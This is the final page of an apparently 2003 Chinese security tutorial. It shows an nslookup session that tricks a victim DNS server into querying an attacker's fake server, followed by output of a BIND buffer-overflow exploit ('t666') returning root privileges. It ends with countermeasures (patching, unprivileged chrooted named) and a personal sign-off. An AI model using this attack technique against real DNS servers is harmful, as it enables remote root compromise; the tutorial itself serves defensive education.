Default Server: localhost.attackers.org Address: 127.0.0.1 > server 10.1.1.100 Default Server: dns.victim.net Address: 10.1.1.100 > hash.attackers.org Server: dns.victim.net Address: 10.1.1.100
可以看到攻击者在其控制的独立系统上的交互模式运行nslookup。然后攻击者向受害的DNS服务器查询“hash.attackers.org”地址,这就使得dns.victim.net查询监听UDP 53端口的伪DNS服务器。一旦目标名字服务器连接到vitter,缓冲区溢出漏洞发掘程序就会发送到dns.victim.net上,并以root访问权限回报攻击者。
[root@vitter]# t666 1 Received request from 10.1.1.100:53 for hash.attackers.org type=1 id uid=0(root) gid=0(root) groups=0(root)
攻击者虽然并没有真正的shell,但是仍以root特权发布命令。
DNS对策:在非DNS服务器上关闭并删去BIND。确保BIND版本是最新的并打上补丁。运行named要用非特权用户方式。named应以-t选项从chrooted()环境中运行。
注:未完待续,可是由于一些私人事情,我真的可能写不下去了,也许我真的需要时间调整心态了,在这里感谢大家的支持,感谢我的朋友。今天我发现我真的很心痛
www.safechina.net vitter@safechina.net 2003.1.3
共6页: 上一页 [1] [2] [3] [4] [5] 6 下一页
|